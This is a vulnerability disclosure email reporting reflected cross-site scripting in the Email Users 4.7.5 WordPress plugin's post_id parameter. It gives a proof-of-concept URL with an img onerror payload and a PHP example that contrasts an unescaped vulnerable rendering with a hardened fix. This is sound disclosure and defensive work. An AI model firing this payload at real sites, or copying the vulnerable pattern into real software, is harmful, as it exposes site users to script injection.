Subject: Cross-Site Scripting (XSS) in Email Users 4.7.5
Date: Mon, 10 Aug 2015 12:54:04 +0200

Hello,

Plugin: Email Users 4.7.5 https://wordpress.org/plugins/email-users/

1. Cross-Site Scripting (XSS)

Authenticated users holding the MAILUSERS_NOTIFY_USERS_CAP capability (define('MAILUSERS_NOTIFY_USERS_CAP', 'email_users_notify')) can inject arbitrary HTML and/or JavaScript code.

Method: GET/POST
URL: http://localhost/wp-admin/admin.php?page=mailusers-send-notify-mail-post&post_id=[XSS]
Vulnerable parameter: post_id

PHP callstack:
email-users/email_users_notify_form.php:161

Verification:
http://localhost/wp-admin/admin.php?page=mailusers-send-notify-mail-post&post_id=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
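The verification payload above starts with `">`, which means post_id is being reflected inside a double-quoted HTML attribute without escaping. The following PHP is an added illustration written for this advisory, not the plugin's code: the markup at email_users_notify_form.php:161 is not quoted here, so the hidden-field rendering is an assumption. It contrasts the unsafe reflection with the standard fix, casting post_id to an integer and escaping it on output (in WordPress the equivalents are absint() and esc_attr()).

```php
<?php
// Added illustration, not the plugin's own code. The advisory only states
// that post_id is reflected at email_users_notify_form.php:161; rendering it
// as a hidden form field is an assumption made for this example.

// Vulnerable pattern (assumed): the raw request value lands inside a
// double-quoted attribute. A value beginning with  ">  closes both the
// attribute and the tag, so the rest of the value becomes new markup.
function render_post_id_vulnerable(string $post_id): string {
    return '<input type="hidden" name="post_id" value="' . $post_id . '">';
}

// Hardened form: post_id is only ever a positive integer, so validate it as
// one first (WordPress: absint()) and still escape on output (WordPress:
// esc_attr()), so a later change to the field type cannot reintroduce XSS.
function render_post_id_hardened(string $post_id): string {
    $id = (int) $post_id;                  // non-numeric input becomes 0
    if ($id <= 0) {
        return '<p>Invalid post id.</p>';  // reject; never reflect the input
    }
    $safe = htmlspecialchars((string) $id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="post_id" value="' . $safe . '">';
}

// Demonstration with the advisory's verification payload, URL-decoded.
$payload = urldecode('%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E');
echo "Vulnerable:             " . render_post_id_vulnerable($payload) . "\n";
echo "Hardened (payload):     " . render_post_id_hardened($payload) . "\n";
echo "Hardened (valid id 42): " . render_post_id_hardened('42') . "\n";
```

Run with `php example.php`: the vulnerable output contains a live `<img onerror=...>` element, while the hardened output for the same input is the "Invalid post id." fallback, and only a genuine integer reaches the attribute.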

--
Regards,
Marcin Probola,